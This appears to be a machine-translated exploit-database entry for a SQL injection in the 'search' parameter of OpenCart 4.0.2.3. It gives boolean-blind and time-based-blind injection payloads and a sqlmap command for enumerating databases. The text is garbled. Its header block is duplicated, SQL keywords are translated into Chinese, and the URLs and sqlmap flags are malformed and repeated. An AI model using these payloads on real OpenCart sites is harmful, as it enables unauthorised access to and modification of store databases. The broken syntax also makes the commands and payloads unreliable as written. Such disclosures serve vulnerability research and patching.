#利用title: OpenCart Core 4.0.2.3-'search'sqli
#日期: 2024-04-2
#利用作者:沙特阿莱纳齐
#供应商homepage3360 https://www.opencart.com/
#软件link: https://github.com/opencart/opencart/Releases
#版本: 4.0.2.3
#测试在: XAMPP,Linux
#Contact: https://twitter.com/dmaral3noz
*描述:
OPENCART允许通过/index.php?route=product/searchsearch=中的参数“搜索”注入SQL注入。
利用此问题可以允许攻击者补偿应用程序,访问或修改数据,或利用基础数据库中的潜在漏洞。
*复制的步骤:
输出:
参数:搜索(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
PAYLOAD: ROUTE=product/searchSearch=')和2427=2427- drca
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ROUTE=product/searchSearch=')和(从(select(sleep(5)))uudj) - nabb
#日期: 2024-04-2
#利用作者:沙特阿莱纳齐
#供应商homepage3360 https://www.opencart.com/
#软件link: https://github.com/opencart/opencart/Releases
#版本: 4.0.2.3
#测试在: XAMPP,Linux
#Contact: https://twitter.com/dmaral3noz
*描述:
OPENCART允许通过/index.php?route=product/searchsearch=中的参数“搜索”注入SQL注入。
利用此问题可以允许攻击者补偿应用程序,访问或修改数据,或利用基础数据库中的潜在漏洞。
*复制的步骤:
- 转到: http://127.0.0.1/index.php?Route=product/searchsearch=test
- 新使用命令sqlmap : sqlmap -u'http://127.0.0.0.1/index.php?route=product/searchsearchsearchsearch=#1' - level=5--- -risk=5 - risk=3 -p search -dbs -dbs -dbs
输出:
参数:搜索(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
PAYLOAD: ROUTE=product/searchSearch=')和2427=2427- drca
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ROUTE=product/searchSearch=')和(从(select(sleep(5)))uudj) - nabb
